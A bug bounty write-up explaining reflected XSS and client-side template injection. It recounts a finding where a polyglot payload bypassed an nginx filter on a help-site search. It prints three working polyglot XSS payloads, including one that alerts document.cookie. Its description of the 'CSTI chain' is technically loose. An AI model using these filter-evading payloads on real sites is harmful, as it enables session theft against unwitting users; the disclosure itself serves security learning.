Hii Everyone I’m Suryesh a Bug Bounty Hunter. In this write-up/blog i’ll explained about Reflected Xss. So, everything i’ll keep it very simple. Please forgot to any grammatical error. So, Let’s get Start
What is Reflected Xss?.
In this type of attack, the malicious script is not stored on the vulnerable website but is instead injected into the page by the attacker and reflected in the user’s browser. Reflected XSS attacks are typically less severe than stored XSS attacks, as they only affect the user who the attacker specifically targeted
The script is reflected in a web browser, typically through URL parameters or forms, and executed immediately.
Example: An attacker crafts a URL with a malicious script that executes when the victim clicks the link.
CSTI:- Client-Side Template Injection (CSTI), also known as Client-Side Injection or JavaScript Template Injection, is a web vulnerability where an attacker injects malicious payloads into JavaScript template expressions on the client side. CSTI affects JavaScript templating engines running in the browser. This can lead to serious security issues, such as cross-site scripting (XSS), which may escalate to remote code execution (RCE) if the payload can influence server logic.
So now let’s Jump on our Topics.
So, basically the target has features to search anything from there help.target.com subdomain. So initially i started Basics Xss Payload and analyse it. My all the Payload got block by nginx server. it give me 403 Forbidden on all the Basics Payloads But i do not want to leave it easily. so Now I start using Polygot Payload and one of my payload work.
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(document.domain)//>
For Cookie:
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(document.cookie)//>
Now Let’s Chain into CSTI.
For Chain into CSTI we have modify payload into csti payload, There are lot of Payload available on github you can get it.
So the our Payload is
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert(7*7)//>
I report this issue to them But Unfortunately they mark this as Duplicate of Mine Report Because i was report 2 XSS with Same Payload.
I hope You learn something from our writeup. Don’t forget to follow on Social Media. And Lastly Video Poc is coming soon on our YouTube Channel So also Subscribe my Channel.
